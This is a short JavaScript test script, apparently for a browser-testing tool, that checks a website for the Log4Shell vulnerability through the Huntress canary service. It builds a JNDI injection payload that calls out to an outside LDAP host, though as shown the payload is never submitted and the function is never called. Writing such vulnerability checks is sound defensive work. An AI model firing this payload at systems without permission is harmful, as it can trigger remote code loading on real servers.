//
// Change this to the site you wish to test against
// As mentioned on huntress Log4Shell, a negative test does
// NOT mean that your site is not vulnerable.
//
// While this script is meant to be generic, you can modify
// it to be specific to your login page manually if needed.
//
// See: https://log4shell.huntress.com/
//
// Note this script was last updated : 14th Dec 2021
//
// !!! MODIFY THE SITE URL HERE (phptravels, is a dummy testing site)
let testSite = "https://www.phptravels.net/"

//------------------------------------------------------------------------

TEST.log.info("DISCLAIMER: Your site is not guaranteed to be safe, if this test passes, it only means you are definitely vulnerable if it fails - see : https://log4shell.huntress.com/ for more info.")
TEST.log.info("This test snippet/test function should ONLY be used against sites you are permitted to test against")

// Function which helps make this test easily reusable across multiple URLs
function testWebsiteForLog4Shell(testURL) {
    // Let's get the log4shell test token
    I.goTo("https://log4shell.huntress.com/")
    let log4shell_id = I.getText("/html/body/main/div/p[5]/code")
    let log4shell_str = "${jndi:ldap://log4shell.huntress.com:1389/"+log4shell_id+"}";
    TEST.log.info("Log4Shell Test ID: "+log4shell_id)

    // Let's go to the target site, and test it
    I.goTo(testURL)

    //------------------------------------------------------------------------
    if( ( I.see$$("unusual activity") || I.see$$("protected") ) && I.see$$("206.189") ) {
        TEST.log.info("Log4Shell Test Aborted : your website is protected by a WAF which blocks common attack patterns for this exploit - it is still recommended to validate internally, and ensure your system is protected without the use of a WAF");
    }
}